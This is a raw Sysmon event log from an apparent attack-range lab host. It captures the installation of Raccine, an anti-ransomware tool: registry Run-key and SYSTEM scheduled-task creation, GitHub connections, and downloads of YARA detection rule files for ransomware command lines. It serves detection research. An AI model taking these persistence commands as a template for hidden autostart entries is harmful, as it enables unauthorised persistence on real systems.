20:10:32.980{9DBE88B5-C33E-61A8-2700-000000000E02}28802412C:\Windows\sysmon64.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000001897339Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:26.754{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-137.attackrange.local57918-false185.199.111.133cdn-185-199-111-133.github.com443https 10341000x80000000000000001897338Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:32.212{9DBE88B5-C33E-61A8-2700-000000000E02}28802380C:\Windows\sysmon64.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897337Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:32.212{9DBE88B5-C33E-61A8-2700-000000000E02}28802380C:\Windows\sysmon64.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000001897335Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:26.572{9DBE88B5-1135-61B1-82FF-000000000E02}6820api.github.com0::ffff:192.30.255.117;C:\Program Files\Raccine\RaccineRulesSync.exe 10341000x80000000000000001897334Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:31.944{9DBE88B5-C33E-61A8-2700-000000000E02}28802412C:\Windows\sysmon64.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000001897332Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:26.586{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-137.attackrange.local57917-false192.30.255.117lb-192-30-255-117-sea.github.com443https 10341000x80000000000000001897331Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:31.445{9DBE88B5-C33E-61A8-2700-000000000E02}28802380C:\Windows\sysmon64.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1abb1|C:\Windows\sysmon64.exe+1cfc7|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897330Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:31.445{9DBE88B5-C33E-61A8-2700-000000000E02}28802380C:\Windows\sysmon64.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\sysmon64.exe+2682c|C:\Windows\sysmon64.exe+1cc6d|C:\Windows\sysmon64.exe+1d392|C:\Windows\sysmon64.exe+1d4a5|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000001897328Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:30.967{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\in-memory\gen_loaders.yarMD5=84F49A433322336905BEDEFA80BCA2E7,SHA256=AA4E921356216E082F46222838E7DCCB2C3423282C27322F699ECD2E00C6029A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897327Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:30.715{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\gen_ransomware_command_lines.yarMD5=762A90EA12262157B9232D236EED6EE5,SHA256=EF0C40289DC5CFADFB341B20891CB960AC32225E8C012CD8467B47189C5C1DFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897326Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:30.552{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\gen_raccine_kills.yarMD5=AB572B9BD5F20A7968C7131087B37BA9,SHA256=B630564B4976590A6549450BCAB4F1369396599053539CC13EEC03F8A21EC2C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897323Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:30.384{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\gen_powershell_invocation.yarMD5=B133FF8F9B05CB9F100A8AC32A94CA41,SHA256=FA7E390A9FC283A129A4AD93E045D4E0FB9D88485C99543C42ECF8C1003DB672,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001897322Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:30.231{9DBE88B5-1135-61B1-82FF-000000000E02}6820NT AUTHORITY\SYSTEMC:\Program Files\Raccine\RaccineRulesSync.exeC:\Program Files\Raccine\yara\ext-vars-test.yarMD5=44CFDD7612842A1FAEB300D715E1CED9,SHA256=CA80F68E7E93F2648859E2498F31940F129303407821512B2CDDE770AD84CD14,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001897320Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.900{9DBE88B5-C32C-61A8-0B00-000000000E02}6324348C:\Windows\system32\lsass.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+25aa7|C:\Windows\system32\lsasrv.dll+26bed|C:\Windows\system32\lsasrv.dll+25925|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d3c|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897319Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.900{9DBE88B5-C32C-61A8-0B00-000000000E02}6324348C:\Windows\system32\lsass.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+67d1f|C:\Windows\system32\lsasrv.dll+2586d|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d3c|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897318Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.793{9DBE88B5-3A90-61AE-EDA7-000000000E02}28164340C:\Windows\Explorer.EXE{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8028EAE4D08)|UNKNOWN(FFFF85E39F30E8DF)|UNKNOWN(FFFF85E39F2A5D52)|UNKNOWN(FFFF85E39F2A0351)|UNKNOWN(FFFF85E39F2A1D1A)|UNKNOWN(FFFF85E39F29FFD6)|UNKNOWN(FFFFF8028E7FD103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e 10341000x80000000000000001897317Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.793{9DBE88B5-3A90-61AE-EDA7-000000000E02}28164340C:\Windows\Explorer.EXE{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8028EAE4D08)|UNKNOWN(FFFF85E39F30E8DF)|UNKNOWN(FFFF85E39F2A5D52)|UNKNOWN(FFFF85E39F2A0351)|UNKNOWN(FFFF85E39F2A1D1A)|UNKNOWN(FFFF85E39F29FFD6)|UNKNOWN(FFFFF8028E7FD103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\Explorer.EXE+51aca 10341000x80000000000000001897316Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.792{9DBE88B5-3A90-61AE-EDA7-000000000E02}28164340C:\Windows\Explorer.EXE{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\Explorer.EXE+5cf54|C:\Windows\Explorer.EXE+5c591|C:\Windows\Explorer.EXE+5a5a3|C:\Windows\Explorer.EXE+5983c|C:\Windows\Explorer.EXE+56de3|C:\Windows\Explorer.EXE+4bb4d|C:\Windows\Explorer.EXE+49f72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+28e4e|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8028EAE4D08)|UNKNOWN(FFFF85E39F30E8DF)|UNKNOWN(FFFF85E39F2A5D52)|UNKNOWN(FFFF85E39F2A0351)|UNKNOWN(FFFF85E39F2A1D1A)|UNKNOWN(FFFF85E39F29FFD6)|UNKNOWN(FFFFF8028E7FD103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e 10341000x80000000000000001897315Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.786{9DBE88B5-C32E-61A8-1000-000000000E02}3841560C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897314Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.785{9DBE88B5-C32E-61A8-1000-000000000E02}3841560C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897312Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.380{9DBE88B5-C32E-61A8-1600-000000000E02}12801448C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897311Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.380{9DBE88B5-C32E-61A8-1600-000000000E02}12801316C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897310Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.139{9DBE88B5-1135-61B1-83FF-000000000E02}54525484C:\Windows\system32\conhost.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001897302Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.118{9DBE88B5-1135-61B1-84FF-000000000E02}6728C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exeTIMEOUT /t 30C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 10341000x80000000000000001897300Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.106{9DBE88B5-C32C-61A8-0500-000000000E02}416432C:\Windows\system32\csrss.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001897295Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.106{9DBE88B5-C32E-61A8-1600-000000000E02}12806664C:\Windows\system32\svchost.exe{9DBE88B5-1135-61B1-82FF-000000000E02}6820C:\Program Files\Raccine\RaccineRulesSync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a731|c:\windows\system32\UBPM.dll+f954|c:\windows\system32\UBPM.dll+cd5c|c:\windows\system32\UBPM.dll+d325|c:\windows\system32\UBPM.dll+dc25|c:\windows\system32\UBPM.dll+2039|c:\windows\system32\UBPM.dll+2b70|c:\windows\system32\UBPM.dll+e6fd|c:\windows\system32\UBPM.dll+e14a|c:\windows\system32\UBPM.dll+dda2|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4 154100x80000000000000001897279Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.072{9DBE88B5-1135-61B1-81FF-000000000E02}4720C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeSCHTASKS /RUN /TN "Raccine Rules Updater"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 11241100x80000000000000001897278Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT10532021-12-08 20:10:29.059{9DBE88B5-C32E-61A8-1600-000000000E02}1280C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Raccine Rules Updater2021-12-08 20:10:29.059 154100x80000000000000001897267Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.046{9DBE88B5-1135-61B1-80FF-000000000E02}4776C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeSCHTASKS /create /tn "Raccine Rules Updater" /tr "\"C:\Program Files\Raccine\RaccineRulesSync.exe\"" /sc DAILY /mo 1 /f /RL highest /RU "NT AUTHORITY\SYSTEM" /NPC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 10341000x80000000000000001897265Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.043{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001897261Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.043{9DBE88B5-1126-61B1-57FF-000000000E02}31727052C:\Windows\system32\cmd.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+1b13|C:\Windows\system32\cmd.exe+c9d2|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001897260Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.042{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe1.0.0.0RaccineSettings BETARaccineSettings-RaccineSettings.exe"C:\Program Files\Raccine\RaccineSettings.exe" C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=29BEFACEE533F2FEFB428C39412DF12C,SHA256=EC15047F8A802CF6CADB5EA3860C380BB3314E9A91A96464DC1837192773AB6A,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897259Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1060,RunKeySetValue2021-12-08 20:10:29.040{9DBE88B5-1135-61B1-7EFF-000000000E02}6672C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Raccine TrayC:\Program Files\Raccine\RaccineSettings.exe 154100x80000000000000001897251Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.031{9DBE88B5-1135-61B1-7EFF-000000000E02}6672C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /t REG_SZ /F /D "C:\Program Files\Raccine\RaccineSettings.exe"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897243Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.020{9DBE88B5-1135-61B1-7DFF-000000000E02}3384C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeREG.EXE ADD HKLM\Software\Raccine /v RulesDir /t REG_SZ /d "C:\Program Files\Raccine\yara" /FC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 